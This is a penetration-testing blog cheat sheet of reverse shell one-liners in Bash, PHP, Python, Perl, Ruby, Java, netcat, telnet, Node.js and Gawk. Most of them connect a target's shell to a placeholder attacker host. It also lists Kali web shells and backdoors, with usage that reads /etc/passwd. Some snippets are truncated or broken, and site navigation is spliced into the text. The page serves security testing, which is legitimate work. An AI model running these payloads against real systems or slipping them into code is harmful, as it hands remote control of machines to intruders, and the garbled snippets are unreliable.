



Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC, JSP, Java, Perl ∞

CHEAT-SHEET

27 Feb 2022



Arr0way

During penetration testing if you're lucky enough to find a remote command execution vulnerability, you'll more often than not want to connect back to your attacking machine to leverage an interactive shell.

Below are a collection of Windows and Linux **reverse shells** that use commonly installed programming languages PHP,

Table of Contents

- [Setup Listening Netcat](#)
- [Bash Reverse Shells](#)
- [socat Reverse Shell](#)
- [Golang Reverse Shell](#)
- [PHP Reverse Shell](#)
- [Netcat Reverse Shell](#)
- [Node.js Reverse Shell](#)
- [Telnet Reverse Shell](#)

[All Blog](#)

[Cheat Sheets](#)

[Techniques](#)

[Security Hardening](#)

[WalkThroughs](#)

CHEAT SHEETS

[Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC, JSP, Java, Perl](#)

[Nmap Cheat Sheet: Commands & Examples \(2022\)](#)

[DNS Tunneling dnscat2 Cheat Sheet](#)

[SSH Lateral Movement Cheat Sheet](#)

Python, Powershell, nc (Netcat), JSP, Java, Bash, PowerShell (PS). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.

If you found this resource usefull you should also check out our [penetration testing tools](#) cheat sheet which has some additional reverse shells and other commands useful when performing penetration testing.

25/02/2022 - House keeping 17/09/2020
- Updated to add the reverse shells submitted via Twitter @JaneScott
29/03/2015 - Original post date

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back, a simple way to do this is using a cloud instance / VPS - Linode is a

- Perl Reverse Shell
 - Perl Windows Reverse Shell
- Ruby Reverse Shell
- Java Reverse Shell
- Python Reverse Shell
- Gawk Reverse Shell
- Kali Web Shells
 - Kali PHP Web Shells
 - Kali Perl Reverse Shell
 - Kali Cold Fusion Shell
 - Kali ASP Shell
 - Kali ASPX Shells
 - Kali JSP Reverse Shell

Android Pen Testing
Environment Setup
Password Reset Testing
Cheat Sheet
SSRF Cheat Sheet &
Bypass Techniques
Penetration Testing Tools
Cheat Sheet
LFI Cheat Sheet
Vi Cheat Sheet
Systemd Cheat Sheet
nbtscan Cheat Sheet
Linux Commands Cheat
Sheet
More »

WALKTHROUGHS

InsomniHack CTF Teaser
- Smartcat2 Writeup
InsomniHack CTF Teaser
- Smartcat1 Writeup
FristiLeaks 1.3
Walkthrough
SickOS 1.1 - Walkthrough
The Wall Boot2Root
Walkthrough

good choice as they give you a direct public IP so there is no NAT issues to worry about or debug, [you can use this link](#) to get a \$100 Linode voucher.

!! Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the following:

```
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
```

i NAT requires a port forward

If you're attacking machine is behind a NAT router, you'll need to setup a port forward to the attacking machines IP / Port.

ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).

[More »](#)

TECHNIQUES

[SSH & Meterpreter](#)

[Pivoting Techniques](#)

[More »](#)

SECURITY HARDENING

[Security Harden CentOS](#)

[7](#)

[More »](#)

/DEV/URANDOM

[MacBook - Post Install](#)

[Config + Apps](#)

[More »](#)

OTHER BLOG

[Insecure Direct Object Reference \(IDOR\): Definition, Examples & How to Find](#)

Bash Reverse Shells

```
exec /bin/bash 0&0 2>&0
```

```
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
```

```
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

# or:

while read line 0<&5; do $line 2>&5 >&5; done
```

```
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
```

socat Reverse Shell

Source: @filip_dragovic

```
socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &
```

Encrypted Notes App
Solution (iOS, Android,
MacOS, Linux, Windows)
HowTo: Kali Linux
Chromium Install for
Web App Pen Testing
Jenkins RCE via
Unauthenticated API
MacBook - Post Install
Config + Apps
enum4linux Cheat Sheet
Linux Local Enumeration
Script
HowTo Install Quassel on
Ubuntu
HowTo Install KeepNote
on OSX Mavericks

Golang Reverse Shell

```
echo 'package main;import"os/exec";import"net";func main(){c, _:=net
```

PHP Reverse Shell

A useful PHP reverse shell:

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3")';
```

(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

Another PHP reverse shell (that was submitted via Twitter):

```
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&3')";
```

Base64 encoded by @0xInfection:

```
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x
```

Netcat Reverse Shell

Useful netcat reverse shell examples:

Don't forget to start your listener, or you won't be catching any shells :)

```
nc -lnvp 80
```

```
nc -e /bin/sh ATTACKING-IP 80
```

```
/bin/sh | nc ATTACKING-IP 80
```

```
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
```

A reverse shell submitted by [@Oxatul](#) which works well for OpenBSD netcat rather than GNU nc:

```
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | t
```

Node.js Reverse Shell

```
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1
```

Source: @jobertabma via @JaneScott

Telnet Reverse Shell

```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
```

```
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,6);connect(S,$i,$p);exec "/bin/bash";'
```

Perl Windows Reverse Shell

```
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");$c->listen(5);my $s=$c->accept();$c->close();exec "/bin/bash";'
```

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,6);connect(S,$i,$p);exec "/bin/bash";'
```

Ruby Reverse Shell

```
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("bash -i >> %s\n",f.to_s);'
```

Java Reverse Shell

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5|tr -d '\n'>&5"])
p.waitFor()
```


Python Reverse Shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));s.sendall("pwn");p=subprocess.Popen(["/bin/sh"],shell=True);p.stdout,&p.stderr,&p.stdin=s'
```

Gawk Reverse Shell

Gawk one liner rev shell by @dmfroberson:

```
gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P";v=system("nc -e /bin/sh "V);while(1){print S;v;S="> ";}}'
```

```
#!/usr/bin/gawk -f

BEGIN {

    Port      =      8080
    Prompt    =      "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {

            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
```

Kali Web Shells

The following shells exist within Kali Linux, under `/usr/share/webshells/` these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

Kali PHP reverse shells and command shells:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/php/php-reverse-shell.php</code>	Pen Test Monkey - PHP Reverse Shell
<code>/usr/share/webshells/php/php-findsock-shell.php</code> <code>/usr/share/webshells/php/findsock.c</code>	Pen Test Monkey, Findsock Shell. Build <code>gcc -o findsock findsock.c</code> (be mindfull of the target servers architecture), execute with netcat not a browser <code>nc -v target 80</code>
<code>/usr/share/webshells/php/simple-backdoor.php</code>	PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: <code>http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd</code>
<code>/usr/share/webshells/php/php-backdoor.php</code>	Larger PHP shell, with a text input box for command execution.



Tip: Executing Reverse Shells

The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

Kali perl reverse shell:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/perl/perl-reverse-shell.pl</code>	Pen Test Monkey - Perl Reverse Shell
<code>/usr/share/webshells/perl/perlcmd.cgi</code>	Pen Test Monkey, Perl Shell. Usage: <code>http://target.com/perlcmd.cgi?cat /etc/passwd</code>

Kali Cold Fusion Shell

Kali Coldfusion Shell:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/cfm/cfexec.cfm</code>	Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

Classic ASP Reverse Shell + CMD shells:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/asp/</code>	Kali ASP Shells

Kali ASPX Shells

ASP.NET reverse shells within Kali:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/aspx/</code>	Kali ASPX Shells

Kali JSP Reverse Shell

Kali JSP Reverse Shell:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/jsp/jsp-reverse.jsp</code>	Kali JSP Reverse Shell

Share this on...

 Twitter  Facebook  Google+  Reddit

Follow Arr0way

 Twitter  GitHub

Also...

You might want to read these



CATEGORY	POST NAME
Web App Security	Insecure Direct Object Reference (IDOR): Definition, Examples & How to Find

CATEGORY	POST NAME
cheat-sheet	Nmap Cheat Sheet: Commands & Examples (2022)
SecOps	Encrypted Notes App Solution (iOS, Android, MacOS, Linux, Windows)
cheat-sheet	DNS Tunneling dnscat2 Cheat Sheet
cheat-sheet	SSH Lateral Movement Cheat Sheet
cheat-sheet	Android Pen Testing Environment Setup
cheat-sheet	Password Reset Testing Cheat Sheet
cheat-sheet	SSRF Cheat Sheet & Bypass Techniques
cheat-sheet	Penetration Testing Tools Cheat Sheet
cheat-sheet	LFI Cheat Sheet

The contents of this website are © 2022
HighOn.Coffee

Proudly hosted by **GitHub**

